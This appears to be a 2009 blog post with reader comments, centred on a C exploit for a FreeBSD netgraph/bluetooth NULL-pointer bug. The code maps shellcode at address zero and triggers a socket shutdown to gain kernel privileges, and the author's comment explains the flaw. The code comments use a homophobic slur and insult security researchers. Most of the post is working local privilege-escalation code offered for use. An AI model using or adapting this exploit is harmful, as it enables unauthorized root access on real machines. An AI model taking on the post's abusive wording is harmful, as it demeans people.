base3:

base3 (

base3) wrote,
@ 2009-01-15 00:33:00

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

/* What kind of faggot has bluetooth enabled on his FreeBSD desktop,  */
/* to which there are also untrusted users logged in? A bulnerability */
/* that could only ever be found by a twat of a 'security resaercher' */

char payload[] = { 0x55, 0x64, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x8b,
                   0x00, 0x8b, 0x40, 0x20, 0xc7, 0x40, 0x04, 0x00,
                   0x00, 0x00, 0x00, 0x89, 0xe5, 0x31, 0xc0, 0xc9,
                   0xc3, 0x00 };

int main(int argc, char** argv)
{
  int x;
  int f;
  int u;

  char *args[] = {"/bin/sh", 0};

  f = open("/home/base3/test", O_RDWR);

  mmap(0, 2048, PROT_WRITE | PROT_EXEC, MAP_FIXED, f, 0);
  strncpy((char *)0, payload, 26);

  x = socket(PF_NETGRAPH , SOCK_STREAM, PF_NETGRAPH);
  if (x == -1)
    printf("Fuck.\nAn error, number %d, happened\n", errno);

  shutdown (x, SHUT_RDWR);

  u = (int) geteuid();
  printf ("Your uid is %d\n", u);

  //execve(args[0], args, 0);

  return 0;
}

(5 comments) - (Post a new comment)

	angryskul 2009-01-15 01:58 pm UTC (link)
	How the heck does that even work? I'm trying to read it and it looks you: 1) open up a test file 2) mmap it to address 0 3) copy the payload to this address using strncpy (why not memcpy?) 4) open a netgraph socket 5) call shutdown on it 6) privs are elevated... ? wow...something about the shutdown hook in bluetooth's netgraph code? (Reply to this) (Thread)

	base3 2009-01-17 02:05 pm UTC (link)
	the shutdown function for both bluetooth and netgraph protocol is initialized to NULL, but then it is called at socket shutdown without being tested for NULL. this exploit was found by someone else (an overly self-important cocksucker of a 'security resaercher') and reported, but i just felt like writing an exploit for it. (Reply to this) (Parent)(Thread)

	angryskul 2009-01-17 06:03 pm UTC (link)
	It seems we share the same view of the shellcode variant of the "security researcher". I do have some admiration of those that are able to use math, rather than just overruns/null to exploit things. (Reply to this) (Parent)(Thread)

	base3 2009-01-20 12:37 am UTC (link)
	they have their purpose, as long as they dont think they are some kind of superhero hacker, just for auditing some code (or even reverse engineering) and finding a buffer overflow (Reply to this) (Parent)(Thread)

	angryskul 2009-01-20 01:51 am UTC (link)
	Agreed, I find the whole process rather tedious myself. go write a filesystem. :) (Reply to this) (Parent)

(5 comments) - (Post a new comment)

Username:		Create an Account Forgot your login or password? Login w/ OpenID
Password:
	Remember Me
	English • Español • Deutsch • Русский…

About

Help

Get Involved

Legal

Store

LJ Labs